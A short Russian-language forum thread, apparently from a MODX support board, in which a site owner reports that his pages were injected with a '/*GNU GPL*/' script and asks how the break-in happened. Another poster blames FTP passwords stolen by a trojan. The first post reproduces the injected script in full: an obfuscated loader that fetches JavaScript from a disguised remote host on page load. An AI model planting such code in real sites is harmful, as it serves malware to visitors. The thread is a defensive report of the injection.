Взлом сайта и код с текстом /*GNU GPL*/

13 Posts

zatomant Reply #1, 14 years, 4 months ago

Вчера обнаружил что во все index.php, index.html и файлы с расширением .js был добавлен следующий код:

<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

Код в файлах я потер. Перепроверил .htaccess на наличие запрета заливать левые файлики, но это лишь припарки...

Меня не столь код интересует как вопрос - как это было сделано и что делать дальше?

Сервер под Linux 2.6.18-164.6.1.el5PAE, MODX 0.9.6.3. Reflect удален. Пароль на ФТП сменил. Докачал скил Параноя до 83.4%

☆ A M B ☆
1,086 Posts

Fuzzy Reply #2, 14 years, 4 months ago

Да сколько уже было таких сообщений - не счесть. Все тупо просто - у Вас украли пароли доступа к сайту по FTP. 99.9% вероятность, что это сделал троян. Нужно, во-первых, сменить все пароли на сервере, во-вторых, прошерстить свой компьютер антивирусом и удалить гада

.
Ну а *GNU GPL* - это или шутка юмориста - создателя трояна, или для отвода глаз.

Разработка сайтов и программных модулей на MODX.
Опыт работы на MODx с 2005 года. Высокое качество.
Компания Baltic Design Colors: http://www.bdcolors.ru.

13 Posts

zatomant Reply #3, 14 years, 4 months ago

Fuzzy : если все так тупо, тогда тему можно закрывать. cool